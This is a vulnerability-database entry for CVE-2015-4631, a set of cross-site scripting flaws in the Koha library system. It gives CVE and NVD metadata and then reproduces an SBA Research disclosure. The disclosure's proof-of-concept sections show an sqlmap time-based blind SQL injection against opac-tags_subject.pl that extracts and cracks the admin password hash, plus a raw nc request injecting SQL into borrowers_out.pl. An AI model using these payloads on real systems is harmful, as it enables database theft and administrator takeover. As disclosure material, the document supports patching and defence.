CVE-2015-4631 (GCVE-0-2015-4631)

Vulnerability from cvelistv5

Published

2018-10-18 20:00

Modified

2024-08-06 06:18

Severity ?

CWE

Summary

References

URL	Tags
cve@mitre.org	https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416	Exploit, Issue Tracking, Vendor Advisory
cve@mitre.org	https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418	Exploit, Issue Tracking, Vendor Advisory
cve@mitre.org	https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423	Exploit, Issue Tracking
cve@mitre.org	https://koha-community.org/koha-3-14-16-released/	Product, Release Notes, Vendor Advisory
cve@mitre.org	https://koha-community.org/security-release-koha-3-16-12/	Product, Release Notes, Vendor Advisory
cve@mitre.org	https://koha-community.org/security-release-koha-3-18-8/	Product, Release Notes, Vendor Advisory
cve@mitre.org	https://koha-community.org/security-release-koha-3-20-1/	Product, Release Notes, Vendor Advisory
cve@mitre.org	https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html	Exploit, Third Party Advisory, VDB Entry
cve@mitre.org	https://seclists.org/fulldisclosure/2015/Jun/80	Exploit, Mailing List, Third Party Advisory
cve@mitre.org	https://www.exploit-db.com/exploits/37389/	Exploit, Third Party Advisory, VDB Entry
cve@mitre.org	https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416	Exploit, Issue Tracking, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418	Exploit, Issue Tracking, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423	Exploit, Issue Tracking
af854a3a-2127-422b-91ae-364da2661108	https://koha-community.org/koha-3-14-16-released/	Product, Release Notes, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://koha-community.org/security-release-koha-3-16-12/	Product, Release Notes, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://koha-community.org/security-release-koha-3-18-8/	Product, Release Notes, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://koha-community.org/security-release-koha-3-20-1/	Product, Release Notes, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://seclists.org/fulldisclosure/2015/Jun/80	Exploit, Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/37389/	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/	Third Party Advisory

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T06:18:12.212Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
          },
          {
            "name": "37389",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/37389/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://koha-community.org/security-release-koha-3-16-12/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
          },
          {
            "name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://koha-community.org/security-release-koha-3-18-8/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://koha-community.org/security-release-koha-3-20-1/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://koha-community.org/koha-3-14-16-released/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2015-06-25T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-18T19:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
        },
        {
          "name": "37389",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/37389/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://koha-community.org/security-release-koha-3-16-12/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
        },
        {
          "name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://koha-community.org/security-release-koha-3-18-8/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://koha-community.org/security-release-koha-3-20-1/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://koha-community.org/koha-3-14-16-released/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2015-4631",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html",
              "refsource": "MISC",
              "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
            },
            {
              "name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418",
              "refsource": "CONFIRM",
              "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
            },
            {
              "name": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/",
              "refsource": "MISC",
              "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
            },
            {
              "name": "37389",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/37389/"
            },
            {
              "name": "https://koha-community.org/security-release-koha-3-16-12/",
              "refsource": "CONFIRM",
              "url": "https://koha-community.org/security-release-koha-3-16-12/"
            },
            {
              "name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423",
              "refsource": "CONFIRM",
              "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
            },
            {
              "name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
              "refsource": "FULLDISC",
              "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
            },
            {
              "name": "https://koha-community.org/security-release-koha-3-18-8/",
              "refsource": "CONFIRM",
              "url": "https://koha-community.org/security-release-koha-3-18-8/"
            },
            {
              "name": "https://koha-community.org/security-release-koha-3-20-1/",
              "refsource": "CONFIRM",
              "url": "https://koha-community.org/security-release-koha-3-20-1/"
            },
            {
              "name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416",
              "refsource": "CONFIRM",
              "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
            },
            {
              "name": "https://koha-community.org/koha-3-14-16-released/",
              "refsource": "CONFIRM",
              "url": "https://koha-community.org/koha-3-14-16-released/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2015-4631",
    "datePublished": "2018-10-18T20:00:00",
    "dateReserved": "2015-06-16T00:00:00",
    "dateUpdated": "2024-08-06T06:18:12.212Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2015-4631\",\"sourceIdentifier\":\"cve@mitre.org\",\"published\":\"2018-10-18T21:29:00.723\",\"lastModified\":\"2024-11-21T02:31:26.413\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl.\"},{\"lang\":\"es\",\"value\":\"M\u00faltiples vulnerabilidades Cross-Site Scripting (XSS) en Koha, en versiones 3.14.x anteriores a la 3.14.16, versiones 3.16.x anteriores a la 3.16.12, versiones 3.18.x anteriores a la 3.18.08 y versiones 3.20.x anteriores a la 3.20.1, permiten que atacantes remotos inyecten scripts web o HTML arbitrarios mediante (1) el par\u00e1metro tag en opac-search.pl; (2) el par\u00e1metro value en authorities/authorities-home.pl; (3) el par\u00e1metro delay en acqui/lateorders.pl; (4) los par\u00e1metros authtypecode o (5) tagfield en admin/auth_subfields_structure.pl; (6) el par\u00e1metro tagfield en admin/marc_subfields_structure.pl; (7) el par\u00e1metro limit en catalogue/search.pl; (8) los par\u00e1metros bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter o (13) title_filter en serials/serials-search.pl; o (14) los par\u00e1metros author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from o (22) suggesteddate_to en suggestion/suggestion.pl o los par\u00e1metros (23) direction, (24) display o (25) addshelf en opac-shelves.pl.\"}],\"metrics\":{\"cvssMetricV30\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\",\"baseScore\":5.4,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.3,\"impactScore\":2.7}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:M/Au:S/C:N/I:P/A:N\",\"baseScore\":3.5,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"MEDIUM\",\"authentication\":\"SINGLE\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"NONE\"},\"baseSeverity\":\"LOW\",\"exploitabilityScore\":6.8,\"impactScore\":2.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":true}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"3.14.00\",\"versionEndExcluding\":\"3.14.16\",\"matchCriteriaId\":\"214E9AA7-580C-4028-AB21-0D723D3037FD\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"3.16.00\",\"versionEndExcluding\":\"3.16.12\",\"matchCriteriaId\":\"CEBF9831-C8D6-4503-8192-13D04FB057DB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"3.18.0\",\"versionEndExcluding\":\"3.18.8\",\"matchCriteriaId\":\"A50154EE-37E5-4872-8A1C-57AA8132E91B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"3.20.00\",\"versionEndExcluding\":\"3.20.1\",\"matchCriteriaId\":\"AE6E0A0A-BA1C-4F6B-92E0-796FFD77AF41\"}]}]}],\"references\":[{\"url\":\"https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Issue Tracking\",\"Vendor Advisory\"]},{\"url\":\"https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Issue Tracking\",\"Vendor Advisory\"]},{\"url\":\"https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Issue Tracking\"]},{\"url\":\"https://koha-community.org/koha-3-14-16-released/\",\"source\":\"cve@mitre.org\",\"tags\":[\"Product\",\"Release Notes\",\"Vendor Advisory\"]},{\"url\":\"https://koha-community.org/security-release-koha-3-16-12/\",\"source\":\"cve@mitre.org\",\"tags\":[\"Product\",\"Release Notes\",\"Vendor Advisory\"]},{\"url\":\"https://koha-community.org/security-release-koha-3-18-8/\",\"source\":\"cve@mitre.org\",\"tags\":[\"Product\",\"Release Notes\",\"Vendor Advisory\"]},{\"url\":\"https://koha-community.org/security-release-koha-3-20-1/\",\"source\":\"cve@mitre.org\",\"tags\":[\"Product\",\"Release Notes\",\"Vendor Advisory\"]},{\"url\":\"https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://seclists.org/fulldisclosure/2015/Jun/80\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://www.exploit-db.com/exploits/37389/\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/\",\"source\":\"cve@mitre.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Issue Tracking\",\"Vendor Advisory\"]},{\"url\":\"https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Issue Tracking\",\"Vendor Advisory\"]},{\"url\":\"https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Issue Tracking\"]},{\"url\":\"https://koha-community.org/koha-3-14-16-released/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Product\",\"Release Notes\",\"Vendor Advisory\"]},{\"url\":\"https://koha-community.org/security-release-koha-3-16-12/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Product\",\"Release Notes\",\"Vendor Advisory\"]},{\"url\":\"https://koha-community.org/security-release-koha-3-18-8/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Product\",\"Release Notes\",\"Vendor Advisory\"]},{\"url\":\"https://koha-community.org/security-release-koha-3-20-1/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Product\",\"Release Notes\",\"Vendor Advisory\"]},{\"url\":\"https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://seclists.org/fulldisclosure/2015/Jun/80\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://www.exploit-db.com/exploits/37389/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]}]}}"
  }
}

var-201810-0024

Vulnerability from variot

Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl. Koha Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Koha is the first open source library automation system. Koha has a SQL injection vulnerability that allows an attacker to exploit a vulnerability to access or modify database data. Koha is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. Multiple directory-traversal vulnerabilities 3. Multiple HTML Injection vulnerabilities 4. Multiple cross-site scripting vulnerabilities 5. Multiple cross site request forgery vulnerabilities An attacker may leverage these issues to access or modify data, exploit latent vulnerabilities in the underlying database, read arbitrary files,allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and to perform unauthorized actions in the context of a logged-in user of the affected application.This may aid in further attacks. =============================================================================================== SBA Research Vulnerability Disclosure ===============================================================================================

title: Koha Unauthenticated SQL injection product: Koha ILS affected version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12 fixed version: 3.20.1, 3.17.8, 3.16.12 CVE numbers: CVE-2015-4633, CVE-2015-4632, CVE-2015-4631 impact: critical website: http://www.koha-community.org/

found by: Raschin Tavakoli / SBA Research Combinatorial Security Testing Group contact: cst@sba-research.org

References: http://koha-community.org/security-release-koha-3-20-1/ http://koha-community.org/security-release-koha-3-18-8/ http://koha-community.org/security-release-koha-3-16-12/

                http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
                http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
                http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
                http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
                http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
                http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423

===============================================================================================

========================= 1. Mutiple SQL Injections =========================

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +
a) Unauthenticated SQL Injection in OPAC interface (CVE-2015-4633) +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +

Vulnerability:

The url parameter 'number' in /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI. If the webserver is misconfigured, the file-system may be accessed as well.

References:

http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412

##################################################################################################

PoC:

##################################################################################################

Inspect Koha database schema

Have a look at how to query the database for superlibrarian users: http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians

So basically we we need to execute some SQL statement like this: sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;

Query the database with sqlmap

So let's fire up sqlmap with the --sql-shell parameter and input the query:

root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4 _ ___ | | ___ ___ {1.0-dev-nongit-20150513} | -| . | | | .'| . | || |||||__,| | || || http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:20:07

[09:20:07] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Parameter: number (GET) Type: AND/OR time-based blind Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1) --- [09:20:09] [INFO] testing MySQL [09:20:09] [INFO] confirming MySQL [09:20:09] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian web application technology: Apache 2.4.10 back-end DBMS: MySQL >= 5.0.0 [09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER

sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1; [09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1' [09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind [09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait.............................. [09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors admin [09:21:46] [INFO] retrieved: $2a$08$taQ [09:23:33] [ERROR] invalid character detected. retrying.. [09:23:33] [WARNING] increasing time delay to 5 seconds afOgEEhU [09:25:10] [ERROR] invalid character detected. retrying.. [09:25:10] [WARNING] increasing time delay to 6 seconds t/gW [09:26:13] [ERROR] invalid character detected. retrying.. [09:26:13] [WARNING] increasing time delay to 7 seconds TOmqnYe1Y6ZNxCENa [09:29:57] [ERROR] invalid character detected. retrying.. [09:29:57] [WARNING] increasing time delay to 8 seconds 2.ONk2eZhnuEw5z9OjjxS [09:35:08] [ERROR] invalid character detected. retrying.. [09:35:08] [WARNING] increasing time delay to 9 seconds

select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;: 'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS'

Feed john the ripper and be lucky

root@kali:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass root@kali:/home/wicked# john ./admin-pass Loaded 1 password hash (OpenBSD Blowfish [32/64 X2]) admin (?) guesses: 1 time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015) c/s: 260 trying: Smokey - allstate Use the "--show" option to display all of the cracked passwords reliably

root@kali:/home/wicked# john ./admin-pass --show ?:admin

1 password hash cracked, 0 left

If the webserver is misconfigured, read & write access to the filesystem may be possible.

References:

http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426

##################################################################################################

PoC:

##################################################################################################

==================================================================== 1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil') ====================================================================

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=&password=&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002

